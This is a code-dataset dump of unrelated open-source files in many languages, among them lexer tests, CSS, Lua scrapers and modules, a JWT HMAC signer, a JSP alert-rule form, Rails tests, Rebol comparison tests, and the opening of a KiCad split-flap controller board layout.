content
stringlengths
4
1.04M
lang
stringclasses
358 values
score
int64
0
5
repo_name
stringlengths
5
114
repo_path
stringlengths
4
229
repo_licenses
listlengths
1
8
%% %unicode 3.2 %public %class UnicodeLetter_3_2 %type int %standalone %include ../../resources/common-unicode-all-enumerated-property-java %% <<EOF>> { printOutput(); return 1; } [:letter:] { setCurCharPropertyValue("Letter"); } [^[:letter:]] { setCurCharPropertyValue("Not-Letter"); }
JFlex
3
Mivik/jflex
testsuite/testcases/src/test/cases/unicode-letter/UnicodeLetter_3_2.flex
[ "BSD-3-Clause" ]
@import url(djangodocs.css); @import url(djangosite.css);
CSS
0
gh-oss-contributor/graphql-engine-1
docs/_theme/djangodocs/static/default.css
[ "Apache-2.0", "MIT" ]
-- Copyright 2021 Jeff Foley. All rights reserved. -- Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file. local url = require("url") name = "Gists" type = "scrape" function start() set_rate_limit(1) end function vertical(ctx, domain) local gist_re = "https://gist[.]github[.]com/[a-zA-Z0-9-]{1,39}/[a-z0-9]{32}" for i=1,20 do local resp, err = request(ctx, {['url']=build_url(domain, i)}) if (err ~= nil and err ~= "") then log(ctx, "vertical request to service failed: " .. err) break end local gists = find(resp, gist_re) if (gists == nil or #gists == 0) then break end for _, gist in pairs(gists) do scrape(ctx, {['url']=gist}) end end end function build_url(domain, pagenum) local params = { ['ref']="searchresults", ['q']=domain, ['p']=pagenum, } return "https://gist.github.com/search?" .. url.build_query_string(params) end
Ada
4
Elon143/Amass
resources/scripts/scrape/gists.ads
[ "Apache-2.0" ]
/** * This file is part of the Phalcon Framework. * * (c) Phalcon Team <team@phalcon.io> * * For the full copyright and license information, please view the LICENSE.txt * file that was distributed with this source code. */ namespace Phalcon\Security\JWT\Signer; use Phalcon\Security\JWT\Exceptions\UnsupportedAlgorithmException; /** * Class Hmac */ class Hmac extends AbstractSigner { /** * Hmac constructor. * * @param string $algo * * @throws UnsupportedAlgorithmException */ public function __construct(string! algo = "sha512") { array supported; let supported = [ "sha512" : 1, "sha384" : 1, "sha256" : 1 ]; if !isset supported[algo] { throw new UnsupportedAlgorithmException( "Unsupported HMAC algorithm" ); }; let this->algorithm = algo; } /** * Return the value that is used for the "alg" header * * @return string */ public function getAlgHeader() -> string { return "HS" . str_replace("sha", "", this->algorithm); } /** * Sign a payload using the passphrase * * @param string $payload * @param string $passphrase * * @return string */ public function sign(string! payload, string! passphrase) -> string { return this->getHash(payload, passphrase); } /** * Verify a passed source with a payload and passphrase * * @param string $source * @param string $payload * @param string $passphrase * * @return bool */ public function verify(string! source, string! payload, string! passphrase) -> bool { return hash_equals(source, this->getHash(payload, passphrase)); } /** * Calculates a hash from the passed parameters * * @param string $payload * @param string $passphrase * * @return string */ private function getHash(string! payload, string! passphrase) -> string { return hash_hmac(this->getAlgorithm(), payload, passphrase, true); } }
Zephir
5
chipco/cphalcon
phalcon/Security/JWT/Signer/Hmac.zep
[ "BSD-3-Clause" ]
require 'nn' local AuxiliaryLossTable, parent = torch.class('w2nn.AuxiliaryLossTable', 'nn.Module') function AuxiliaryLossTable:__init(i) parent.__init(self) self.i = i or 1 self.gradInput = {} self.output_table = {} self.output_tensor = torch.Tensor() end function AuxiliaryLossTable:updateOutput(input) if self.train then for i=1,#input do self.output_table[i] = self.output_table[i] or input[1].new() self.output_table[i]:resizeAs(input[i]):copy(input[i]) end for i=#input+1, #self.output_table do self.output_table[i] = nil end self.output = self.output_table else self.output_tensor:resizeAs(input[1]):copy(input[1]) self.output_tensor:copy(input[self.i]) self.output = self.output_tensor end return self.output end function AuxiliaryLossTable:updateGradInput(input, gradOutput) for i=1,#input do self.gradInput[i] = self.gradInput[i] or input[1].new() self.gradInput[i]:resizeAs(input[i]):copy(gradOutput[i]) end for i=#input+1, #self.gradInput do self.gradInput[i] = nil end return self.gradInput end function AuxiliaryLossTable:clearState() self.gradInput = {} self.output_table = {} nn.utils.clear(self, 'output_tensor') return parent:clearState() end
Lua
3
zhyukun/waifu
lib/AuxiliaryLossTable.lua
[ "MIT" ]
<%@ page contentType="text/html; charset=utf-8" %> <%@ taglib prefix="a" uri="/WEB-INF/app.tld"%> <%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core"%> <%@ taglib prefix="res" uri="http://www.unidal.org/webres"%> <%@ taglib prefix="w" uri="http://www.unidal.org/web/core"%> <%@taglib uri="http://java.sun.com/jsp/jstl/functions" prefix="fn" %> <jsp:useBean id="ctx" type="com.dianping.cat.system.page.app.Context" scope="request"/> <jsp:useBean id="payload" type="com.dianping.cat.system.page.app.Payload" scope="request"/> <jsp:useBean id="model" type="com.dianping.cat.system.page.app.Model" scope="request"/> <a:mobile> <h3 class="text-center text-success">编辑Crash告警规则</h3> <form name="crashRuleUpdate" id="form" method="post" action="${model.pageUri}?op=crashRuleUpdateSubmit"> <table style='width:100%' class='table table-striped table-condensed '> <input type="hidden" class="input-xlarge" name="crashRule.id" value="${model.crashRule.id}" /> <tr> <td>AppId</td> <td> <c:choose> <c:when test="${fn:length(model.crashRule.id) eq 0}"> <input type="text" class="input-xlarge" name="crashRule.appId" placeholder="AppId" value="${model.crashRule.appId}" required/> </c:when> <c:otherwise> <input type="text" class="input-xlarge" name="crashRule.appId" value="${model.crashRule.appId}" readonly/> </c:otherwise> </c:choose> </td> </tr> <tr> <td>平台</td> <td> <c:choose> <c:when test="${fn:length(model.crashRule.id) eq 0}"> <select id="platform" style="width:270px" name="crashRule.platform"> <option value="android">android</option> <option value="ios">ios</option> </select> </c:when> <c:otherwise> <input type="text" class="input-xlarge" name="crashRule.platform" value="${model.crashRule.platform}" readonly/> </c:otherwise> </c:choose> </td> </tr> <tr> <td>模块</td> <td> <c:choose> <c:when test="${fn:length(model.crashRule.id) eq 0}"> <input type="text" class="input-xlarge" name="crashRule.module" placeholder="模块" value="${model.crashRule.module}" required/> &nbsp;如需对全部模块告警,请填ALL </c:when> <c:otherwise> <input type="text" class="input-xlarge" name="crashRule.module" value="${model.crashRule.module}" readonly/> </c:otherwise> </c:choose> </td> </tr> <tr> <td>Warning阈值</td> <td><input type="text" class="input-xlarge" placeholder="Warning阈值" name="crashRule.warnings" required value="${model.crashRule.warnings}"/> / 分钟</td> </tr> <tr> <td>Error阈值</td> <td><input type="text" class="input-xlarge" placeholder="Error阈值" name="crashRule.errors" required value="${model.crashRule.errors}"/> / 分钟</td> </tr> <tr> <td>联系邮件</td> <td><input type="text" class="input-xlarge" placeholder="联系邮件" name="crashRule.mails" required value="${model.crashRule.mails}"/>(多个以逗号隔开)</td> </tr> <tr> <td style='text-align:center' colspan='2'><input class='btn btn-primary btn-sm' type="submit" name="submit" value="提交" /></td> </tr> </table> </form> <script type="text/javascript"> $(document).ready(function() { $('#userMonitor_config').addClass('active open'); $('#crashRule').addClass('active'); }); </script> </a:mobile>
Java Server Pages
4
woozhijun/cat
cat-home/src/main/webapp/jsp/system/appRule/crashRuleUpdate.jsp
[ "Apache-2.0" ]
#pragma once #define WIN32_LEAN_AND_MEAN #include <windows.h> #include <ProjectTelemetry.h> #include <shlwapi.h> #include <stdexcept> #include <unordered_set> #include <winrt/base.h> #include <filesystem> #include <common/SettingsAPI/settings_helpers.h> #include <common/logger/logger.h>
C
0
szlatkow/PowerToys
src/modules/keyboardmanager/KeyboardManagerEngineLibrary/pch.h
[ "MIT" ]
# frozen_string_literal: true require "cases/helper" require "models/person" require "action_dispatch" module ActiveRecord class ShardSelectorTest < ActiveRecord::TestCase def test_middleware_locks_to_shard_by_default middleware = ActiveRecord::Middleware::ShardSelector.new(lambda { |env| assert_predicate ActiveRecord::Base, :shard_swapping_prohibited? [200, {}, ["body"]] }, ->(*) { :shard_one }) assert_equal [200, {}, ["body"]], middleware.call("REQUEST_METHOD" => "GET") end def test_middleware_can_turn_off_lock_option middleware = ActiveRecord::Middleware::ShardSelector.new(lambda { |env| assert_not_predicate ActiveRecord::Base, :shard_swapping_prohibited? [200, {}, ["body"]] }, ->(*) { :shard_one }, { lock: false }) assert_equal [200, {}, ["body"]], middleware.call("REQUEST_METHOD" => "GET") end def test_middleware_can_change_shards middleware = ActiveRecord::Middleware::ShardSelector.new(lambda { |env| assert ActiveRecord::Base.connected_to?(role: :writing, shard: :shard_one) [200, {}, ["body"]] }, ->(*) { :shard_one }) assert_equal [200, {}, ["body"]], middleware.call("REQUEST_METHOD" => "GET") end def test_middleware_can_handle_string_shards middleware = ActiveRecord::Middleware::ShardSelector.new(lambda { |env| assert ActiveRecord::Base.connected_to?(role: :writing, shard: :shard_one) [200, {}, ["body"]] }, ->(*) { "shard_one" }) assert_equal [200, {}, ["body"]], middleware.call("REQUEST_METHOD" => "GET") end end end
Ruby
4
swaathi/rails
activerecord/test/cases/shard_selector_test.rb
[ "MIT" ]
{{salt['salttest.jinja_error']() }}
SaltStack
0
byteskeptical/salt
tests/integration/files/file/base/issue-10010-macro.sls
[ "Apache-2.0" ]
// Copyright 2020 The gRPC authors. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. syntax = "proto3"; option java_multiple_files = true; option java_package = "io.grpc.examples.namespaced"; option java_outer_classname = "NamespacedExampleProtos"; option objc_class_prefix = "NEP"; package upper.example; // TODO: dependencies are still broken // Need to do something like this: https://packaging.python.org/guides/packaging-namespace-packages/ // import "upper/example/namespaced_dependency.proto"; message NamespacedExample { string value = 1; // TODO: dependencies are still broken // NamespacedDependency dependency = 2; } service NamespacedService { rpc SayHello (NamespacedExample) returns (NamespacedExample) {} }
Protocol Buffer
4
arghyadip01/grpc
bazel/test/python_test_repo/namespaced/upper/example/namespaced_example.proto
[ "Apache-2.0" ]
@import '../../style/themes/index'; @import '../../style/mixins/index'; @popconfirm-prefix-cls: ~'@{ant-prefix}-popconfirm'; .@{popconfirm-prefix-cls} { z-index: @zindex-popoconfirm; }
Less
2
noctis0430-open-source/ant-design-blazor
components/popconfirm/style/index.less
[ "MIT" ]
Rebol [ Title: "Rebol3 compare test script" Author: "Oldes, Peter W A Wood" File: %compare-test.r3 Tabs: 4 Needs: [%../quick-test-module.r3] ] ~~~start-file~~~ "COMPARE" ===start-group=== "char!" --test-- "char! == ..." --assert #"a" == #"a" --assert not (#"a" == 97) --test-- "char! = ..." --assert #"a" = #"a" --assert #"a" = 97 --test-- "char! <> ..." --assert #"a" <> #"b" --assert #"a" <> 98 --assert #"a" <> 97.0 --assert #"a" <> $97 --assert #"a" <> 97% --assert #"a" <> "a" --test-- "char! < ..." --assert #"a" < #"b" --assert #"a" < 98 --test-- "char! > ..." --assert #"b" > #"a" --assert #"a" > 96 --test-- "char! invalid compare" --assert all [error? e: try [#"a" < 98.0] e/id = 'invalid-compare] --assert all [error? e: try [#"a" < $98 ] e/id = 'invalid-compare] --assert all [error? e: try [#"a" < 98% ] e/id = 'invalid-compare] --assert all [error? e: try [#"a" < "a" ] e/id = 'invalid-compare] --assert all [error? e: try [#"a" < 1x1 ] e/id = 'invalid-compare] ===end-group=== ===start-group=== "integer!" --test-- "integer! == ..." --assert 97 == 97 --assert not (97 == 97.0) --assert not (97 == 9700%) --assert not (97 == #"a") --assert not (97 == 0:01:37) --test-- "integer! = ..." --assert 97 = 97 --assert 97 = 97.0 --assert 97 = 9700% --assert 97 = #"a" --assert 97 = 0:01:37 --test-- "integer! < ..." --assert 97 < 98 --assert 97 < 97.1 --assert 97 < 9701% --assert 97 < #"b" --assert 97 < 0:01:38 --test-- "integer! > ..." --assert 97 > 96 --assert 97 > 96.0 --assert 97 > 9600% --assert 98 > #"a" --assert 98 > 0:01:37 --test-- "integer! invalid compare" --assert all [error? e: try [90 < "a" ] e/id = 'invalid-compare] --assert all [error? e: try [90 < 1x1 ] e/id = 'invalid-compare] ===end-group=== ===start-group=== "decimal!" --test-- "decimal! == ..." --assert 97.0 == 97.0 --assert not (97.0 == 97) --assert not (97.0 == 9700%) --assert not (97.0 == #"a") --assert not (97.0 == 0:01:37) --assert not same? 0.3 (0.1 + 0.1 + 0.1) --test-- "decimal! = ..." --assert 97.0 = 97 --assert 97.0 = 97.0 --assert 97.0 = 9700% --assert not (97.0 = #"a") --assert 97.0 = 0:01:37 --assert equal? 0.3 (0.1 + 0.1 + 0.1) --assert equal? (0.1 + 0.1 + 0.1) 0.3 --assert equal? (0.1 + 0.1 + 0.1) 0:0:0.3 --test-- "decimal! < ..." --assert 97.0 < 98 --assert 97.0 < 97.1 --assert 97.0 < 9701% --assert 97.0 < 0:01:38 --test-- "decimal! > ..." --assert 97.0 > 96 --assert 97.0 > 96.0 --assert 97.0 > 9600% --assert 98.0 > 0:01:37 --test-- "decimal! invalid compare" --assert all [error? e: try [90.0 < "a" ] e/id = 'invalid-compare] --assert all [error? e: try [90.0 < 1x1 ] e/id = 'invalid-compare] ===end-group=== ===start-group=== "time!" ;@@ https://github.com/Oldes/Rebol-issues/issues/1103 --test-- "time! == ..." --assert 0:0:1 == 0:0:1 --assert not (0:0:1 == 1) --assert not (0:0:1 == 1.0) --assert not (0:0:1 == 100%) --test-- "time! = ..." --assert 0:0:1 = 0:0:1 --assert 0:0:1 = 1 --assert 0:0:1 = 1.0 --assert 0:0:1.1 = 1.1 --assert 0:0:1 = 100% --assert 0:0:0.3 = (0.1 + 0.1 + 0.1) --assert not equal? 0:0:1 $1 --test-- "time! < ..." --assert 0:0:1 < 0:0:2 --assert 0:0:1 < 2 --assert 0:0:1 < 2.0 --assert 0:0:1.1 < 1.2 --assert 0:0:1 < 200% --test-- "time! > ..." --assert 0:0:2 > 0:0:1 --assert 0:0:2 > 1 --assert 0:0:2 > 1.0 --assert 0:0:2.2 > 2.1 --assert 0:0:2 > 100% --test-- "time! invalid compare" --assert all [error? e: try [0:0:0 < "a" ] e/id = 'invalid-compare] --assert all [error? e: try [0:0:0 < 1x1 ] e/id = 'invalid-compare] ===end-group=== ~~~end-file~~~
Rebol
4
semarie/rebol3-oldes
src/tests/units/compare-test.r3
[ "Apache-2.0" ]
(kicad_pcb (version 20171130) (host pcbnew 5.1.9-73d0e3b20d~88~ubuntu20.04.1) (general (thickness 1.6) (drawings 53) (tracks 296) (zones 0) (modules 39) (nets 46) ) (page User 150.012 119.99) (title_block (title "Splitflap controller board") (company "Scott Bezek") (comment 1 https://github.com/scottbez1/splitflap) ) (layers (0 F.Cu signal) (31 B.Cu signal) (32 B.Adhes user) (33 F.Adhes user) (34 B.Paste user) (35 F.Paste user) (36 B.SilkS user) (37 F.SilkS user) (38 B.Mask user) (39 F.Mask user) (40 Dwgs.User user) (41 Cmts.User user) (42 Eco1.User user) (43 Eco2.User user) (44 Edge.Cuts user) (45 Margin user) (46 B.CrtYd user) (47 F.CrtYd user) (48 B.Fab user) (49 F.Fab user) ) (setup (last_trace_width 0.25) (user_trace_width 0.25) (trace_clearance 0.2) (zone_clearance 0.508) (zone_45_only yes) (trace_min 0.2) (via_size 0.6) (via_drill 0.4) (via_min_size 0.4) (via_min_drill 0.3) (uvia_size 0.3) (uvia_drill 0.1) (uvias_allowed no) (uvia_min_size 0.2) (uvia_min_drill 0.1) (edge_width 0.15) (segment_width 0.2) (pcb_text_width 0.3) (pcb_text_size 1.5 1.5) (mod_edge_width 0.15) (mod_text_size 1 1) (mod_text_width 0.15) (pad_size 5.5 5.5) (pad_drill 4.5) (pad_to_mask_clearance 0.2) (aux_axis_origin 0 0) (visible_elements 7FFFFFFF) (pcbplotparams (layerselection 0x010f0_80000001) (usegerberextensions false) (usegerberattributes true) (usegerberadvancedattributes true) (creategerberjobfile true) (excludeedgelayer false) (linewidth 0.100000) (plotframeref true) (viasonmask false) (mode 1) (useauxorigin false) (hpglpennumber 1) (hpglpenspeed 20) (hpglpendiameter 15.000000) (psnegative false) (psa4output false) (plotreference true) (plotvalue true) (plotinvisibletext false) (padsonsilk false) (subtractmaskfromsilk false) (outputformat 4) (mirror false) (drillshape 1) (scaleselection 1) (outputdirectory "build/")) ) (net 0 "") (net 1 GND) (net 2 "Net-(P2-Pad1)") (net 3 "Net-(P2-Pad2)") (net 4 "Net-(P2-Pad3)") (net 5 "Net-(P3-Pad1)") (net 6 "Net-(P3-Pad2)") (net 7 "Net-(P3-Pad3)") (net 8 "Net-(P3-Pad4)") (net 9 "Net-(P4-Pad1)") (net 10 "Net-(P4-Pad2)") (net 11 "Net-(P4-Pad3)") (net 12 "Net-(P4-Pad4)") (net 13 "Net-(P1-Pad3)") (net 14 "Net-(P1-Pad2)") (net 15 +5V) (net 16 "Net-(P1-Pad4)") (net 17 "Net-(U5-Pad2)") (net 18 "Net-(D1-Pad2)") (net 19 "Net-(D2-Pad2)") (net 20 /MOTOR_DATA_IN) (net 21 /MOTOR_LATCH) (net 22 /SENSOR_DATA_OUT) (net 23 /SENSOR_LATCH) (net 24 /SPI_CLOCK) (net 25 /DBGLED_IN) (net 26 /MOTOR_DATA_OUT) (net 27 /SENSOR_DATA_IN) (net 28 /DBGLED_OUT) (net 29 "Net-(P1-Pad1)") (net 30 "Net-(P2-Pad4)") (net 31 /SENSE1) (net 32 /SENSE2) (net 33 /SENSE3) (net 34 /SENSE4) (net 35 "Net-(U2-Pad6)") (net 36 "Net-(U6-Pad2)") (net 37 "Net-(U7-Pad2)") (net 38 "Net-(R9-Pad1)") (net 39 "Net-(P10-Pad1)") (net 40 "Net-(P10-Pad2)") (net 41 "Net-(P10-Pad3)") (net 42 "Net-(P10-Pad4)") (net 43 "Net-(D1-Pad1)") (net 44 "Net-(JP1-Pad2)") (net 45 +12V) (net_class Default "This is the default net class." (clearance 0.2) (trace_width 0.25) (via_dia 0.6) (via_drill 0.4) (uvia_dia 0.3) (uvia_drill 0.1) (add_net /DBGLED_IN) (add_net /DBGLED_OUT) (add_net /MOTOR_DATA_IN) (add_net /MOTOR_DATA_OUT) (add_net /MOTOR_LATCH) (add_net /SENSE1) (add_net /SENSE2) (add_net /SENSE3) (add_net /SENSE4) (add_net /SENSOR_DATA_IN) (add_net /SENSOR_DATA_OUT) (add_net /SENSOR_LATCH) (add_net /SPI_CLOCK) (add_net GND) (add_net "Net-(D1-Pad1)") (add_net "Net-(D1-Pad2)") (add_net "Net-(D2-Pad2)") (add_net "Net-(J1-Pad13)") (add_net "Net-(J1-Pad14)") (add_net "Net-(J2-Pad13)") (add_net "Net-(J2-Pad14)") (add_net "Net-(JP1-Pad2)") (add_net "Net-(P10-Pad1)") (add_net "Net-(P10-Pad2)") (add_net "Net-(P10-Pad3)") (add_net "Net-(P10-Pad4)") (add_net "Net-(R9-Pad1)") (add_net "Net-(U1-PadISP5)") (add_net "Net-(U2-Pad6)") (add_net "Net-(U3-Pad7)") (add_net "Net-(U5-Pad2)") (add_net "Net-(U6-Pad2)") (add_net "Net-(U7-Pad2)") ) (net_class 5V "" (clearance 0.24) (trace_width 0.35) (via_dia 0.6) (via_drill 0.4) (uvia_dia 0.3) (uvia_drill 0.1) (add_net +5V) ) (net_class MOTOR_POWER "" (clearance 0.3) (trace_width 0.5) (via_dia 0.6) (via_drill 0.4) (uvia_dia 0.3) (uvia_drill 0.1) (add_net "Net-(P1-Pad1)") (add_net "Net-(P1-Pad2)") (add_net "Net-(P1-Pad3)") (add_net "Net-(P1-Pad4)") (add_net "Net-(P2-Pad1)") (add_net "Net-(P2-Pad2)") (add_net "Net-(P2-Pad3)") (add_net "Net-(P2-Pad4)") (add_net "Net-(P3-Pad1)") (add_net "Net-(P3-Pad2)") (add_net "Net-(P3-Pad3)") (add_net "Net-(P3-Pad4)") (add_net "Net-(P4-Pad1)") (add_net "Net-(P4-Pad2)") (add_net "Net-(P4-Pad3)") (add_net "Net-(P4-Pad4)") ) (net_class VMOT "" (clearance 0.3) (trace_width 1) (via_dia 0.6) (via_drill 0.4) (uvia_dia 0.3) (uvia_drill 0.1) (add_net +12V) ) (module ModifiedSymbols:LED_WS2812B_PLCC4_5.0x5.0mm_P3.2mm (layer F.Cu) (tedit 60976B4B) (tstamp 59D9B462) (at 60.452 42.164 180) (descr https://cdn-shop.adafruit.com/datasheets/WS2812B.pdf) (tags "LED RGB NeoPixel") (path /59D16B96) (attr smd) (fp_text reference U5 (at 0 -0.381) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value WS2812B (at 0 4) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text user %R (at 0 0) (layer F.Fab) (effects (font (size 0.8 0.8) (thickness 0.15))) ) (fp_circle (center 0 0) (end 0 -2) (layer F.Fab) (width 0.1)) (fp_line (start 3.65 2.75) (end 3.65 1.6) (layer F.SilkS) (width 0.12)) (fp_line (start -3.65 2.75) (end 3.65 2.75) (layer F.SilkS) (width 0.12)) (fp_line (start -3.65 -2.75) (end 3.65 -2.75) (layer F.SilkS) (width 0.12)) (fp_line (start 2.5 -2.5) (end -2.5 -2.5) (layer F.Fab) (width 0.1)) (fp_line (start 2.5 2.5) (end 2.5 -2.5) (layer F.Fab) (width 0.1)) (fp_line (start -2.5 2.5) (end 2.5 2.5) (layer F.Fab) (width 0.1)) (fp_line (start -2.5 -2.5) (end -2.5 2.5) (layer F.Fab) (width 0.1)) (fp_line (start 2.5 1.5) (end 1.5 2.5) (layer F.Fab) (width 0.1)) (fp_line (start -3.45 -2.75) (end -3.45 2.75) (layer F.CrtYd) (width 0.05)) (fp_line (start -3.45 2.75) (end 3.45 2.75) (layer F.CrtYd) (width 0.05)) (fp_line (start 3.45 2.75) (end 3.45 -2.75) (layer F.CrtYd) (width 0.05)) (fp_line (start 3.45 -2.75) (end -3.45 -2.75) (layer F.CrtYd) (width 0.05)) (pad 1 smd rect (at -2.45 -1.6 180) (size 1.5 1) (layers F.Cu F.Paste F.Mask) (net 15 +5V)) (pad 2 smd rect (at -2.45 1.6 180) (size 1.5 1) (layers F.Cu F.Paste F.Mask) (net 17 "Net-(U5-Pad2)")) (pad 4 smd rect (at 2.45 -1.6 180) (size 1.5 1) (layers F.Cu F.Paste F.Mask) (net 25 /DBGLED_IN)) (pad 3 smd rect (at 2.45 1.6 180) (size 1.5 1) (layers F.Cu F.Paste F.Mask) (net 1 GND)) (model ${KISYS3DMOD}/LED_SMD.3dshapes/LED_WS2812B_PLCC4_5.0x5.0mm_P3.2mm.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) ) (module ModifiedSymbols:LED_WS2812B_PLCC4_5.0x5.0mm_P3.2mm (layer F.Cu) (tedit 60976B4B) (tstamp 59D9B480) (at 87.122 42.164 180) (descr https://cdn-shop.adafruit.com/datasheets/WS2812B.pdf) (tags "LED RGB NeoPixel") (path /59D16EF1) (attr smd) (fp_text reference U8 (at 0 -0.381) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value WS2812B (at 0 4) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text user %R (at 0 0) (layer F.Fab) (effects (font (size 0.8 0.8) (thickness 0.15))) ) (fp_circle (center 0 0) (end 0 -2) (layer F.Fab) (width 0.1)) (fp_line (start 3.65 2.75) (end 3.65 1.6) (layer F.SilkS) (width 0.12)) (fp_line (start -3.65 2.75) (end 3.65 2.75) (layer F.SilkS) (width 0.12)) (fp_line (start -3.65 -2.75) (end 3.65 -2.75) (layer F.SilkS) (width 0.12)) (fp_line (start 2.5 -2.5) (end -2.5 -2.5) (layer F.Fab) (width 0.1)) (fp_line (start 2.5 2.5) (end 2.5 -2.5) (layer F.Fab) (width 0.1)) (fp_line (start -2.5 2.5) (end 2.5 2.5) (layer F.Fab) (width 0.1)) (fp_line (start -2.5 -2.5) (end -2.5 2.5) (layer F.Fab) (width 0.1)) (fp_line (start 2.5 1.5) (end 1.5 2.5) (layer F.Fab) (width 0.1)) (fp_line (start -3.45 -2.75) (end -3.45 2.75) (layer F.CrtYd) (width 0.05)) (fp_line (start -3.45 2.75) (end 3.45 2.75) (layer F.CrtYd) (width 0.05)) (fp_line (start 3.45 2.75) (end 3.45 -2.75) (layer F.CrtYd) (width 0.05)) (fp_line (start 3.45 -2.75) (end -3.45 -2.75) (layer F.CrtYd) (width 0.05)) (pad 1 smd rect (at -2.45 -1.6 180) (size 1.5 1) (layers F.Cu F.Paste F.Mask) (net 15 +5V)) (pad 2 smd rect (at -2.45 1.6 180) (size 1.5 1) (layers F.Cu F.Paste F.Mask) (net 28 /DBGLED_OUT)) (pad 4 smd rect (at 2.45 -1.6 180) (size 1.5 1) (layers F.Cu F.Paste F.Mask) (net 37 "Net-(U7-Pad2)")) (pad 3 smd rect (at 2.45 1.6 180) (size 1.5 1) (layers F.Cu F.Paste F.Mask) (net 1 GND)) (model ${KISYS3DMOD}/LED_SMD.3dshapes/LED_WS2812B_PLCC4_5.0x5.0mm_P3.2mm.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) ) (module ModifiedSymbols:LED_WS2812B_PLCC4_5.0x5.0mm_P3.2mm (layer F.Cu) (tedit 60976B4B) (tstamp 59D9B478) (at 78.232 42.164 180) (descr https://cdn-shop.adafruit.com/datasheets/WS2812B.pdf) (tags "LED RGB NeoPixel") (path /59D16EA0) (attr smd) (fp_text reference U7 (at 0 -0.381) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value WS2812B (at 0 4) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text user %R (at 0 0) (layer F.Fab) (effects (font (size 0.8 0.8) (thickness 0.15))) ) (fp_circle (center 0 0) (end 0 -2) (layer F.Fab) (width 0.1)) (fp_line (start 3.65 2.75) (end 3.65 1.6) (layer F.SilkS) (width 0.12)) (fp_line (start -3.65 2.75) (end 3.65 2.75) (layer F.SilkS) (width 0.12)) (fp_line (start -3.65 -2.75) (end 3.65 -2.75) (layer F.SilkS) (width 0.12)) (fp_line (start 2.5 -2.5) (end -2.5 -2.5) (layer F.Fab) (width 0.1)) (fp_line (start 2.5 2.5) (end 2.5 -2.5) (layer F.Fab) (width 0.1)) (fp_line (start -2.5 2.5) (end 2.5 2.5) (layer F.Fab) (width 0.1)) (fp_line (start -2.5 -2.5) (end -2.5 2.5) (layer F.Fab) (width 0.1)) (fp_line (start 2.5 1.5) (end 1.5 2.5) (layer F.Fab) (width 0.1)) (fp_line (start -3.45 -2.75) (end -3.45 2.75) (layer F.CrtYd) (width 0.05)) (fp_line (start -3.45 2.75) (end 3.45 2.75) (layer F.CrtYd) (width 0.05)) (fp_line (start 3.45 2.75) (end 3.45 -2.75) (layer F.CrtYd) (width 0.05)) (fp_line (start 3.45 -2.75) (end -3.45 -2.75) (layer F.CrtYd) (width 0.05)) (pad 1 smd rect (at -2.45 -1.6 180) (size 1.5 1) (layers F.Cu F.Paste F.Mask) (net 15 +5V)) (pad 2 smd rect (at -2.45 1.6 180) (size 1.5 1) (layers F.Cu F.Paste F.Mask) (net 37 "Net-(U7-Pad2)")) (pad 4 smd rect (at 2.45 -1.6 180) (size 1.5 1) (layers F.Cu F.Paste F.Mask) (net 36 "Net-(U6-Pad2)")) (pad 3 smd rect (at 2.45 1.6 180) (size 1.5 1) (layers F.Cu F.Paste F.Mask) (net 1 GND)) (model ${KISYS3DMOD}/LED_SMD.3dshapes/LED_WS2812B_PLCC4_5.0x5.0mm_P3.2mm.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) ) (module ModifiedSymbols:LED_WS2812B_PLCC4_5.0x5.0mm_P3.2mm (layer F.Cu) (tedit 60976B4B) (tstamp 59D9B470) (at 69.342 42.164 180) (descr https://cdn-shop.adafruit.com/datasheets/WS2812B.pdf) (tags "LED RGB NeoPixel") (path /59D16CF3) (attr smd) (fp_text reference U6 (at 0 -0.381) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value WS2812B (at 0 4) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text user %R (at 0 0) (layer F.Fab) (effects (font (size 0.8 0.8) (thickness 0.15))) ) (fp_circle (center 0 0) (end 0 -2) (layer F.Fab) (width 0.1)) (fp_line (start 3.65 2.75) (end 3.65 1.6) (layer F.SilkS) (width 0.12)) (fp_line (start -3.65 2.75) (end 3.65 2.75) (layer F.SilkS) (width 0.12)) (fp_line (start -3.65 -2.75) (end 3.65 -2.75) (layer F.SilkS) (width 0.12)) (fp_line (start 2.5 -2.5) (end -2.5 -2.5) (layer F.Fab) (width 0.1)) (fp_line (start 2.5 2.5) (end 2.5 -2.5) (layer F.Fab) (width 0.1)) (fp_line (start -2.5 2.5) (end 2.5 2.5) (layer F.Fab) (width 0.1)) (fp_line (start -2.5 -2.5) (end -2.5 2.5) (layer F.Fab) (width 0.1)) (fp_line (start 2.5 1.5) (end 1.5 2.5) (layer F.Fab) (width 0.1)) (fp_line (start -3.45 -2.75) (end -3.45 2.75) (layer F.CrtYd) (width 0.05)) (fp_line (start -3.45 2.75) (end 3.45 2.75) (layer F.CrtYd) (width 0.05)) (fp_line (start 3.45 2.75) (end 3.45 -2.75) (layer F.CrtYd) (width 0.05)) (fp_line (start 3.45 -2.75) (end -3.45 -2.75) (layer F.CrtYd) (width 0.05)) (pad 1 smd rect (at -2.45 -1.6 180) (size 1.5 1) (layers F.Cu F.Paste F.Mask) (net 15 +5V)) (pad 2 smd rect (at -2.45 1.6 180) (size 1.5 1) (layers F.Cu F.Paste F.Mask) (net 36 "Net-(U6-Pad2)")) (pad 4 smd rect (at 2.45 -1.6 180) (size 1.5 1) (layers F.Cu 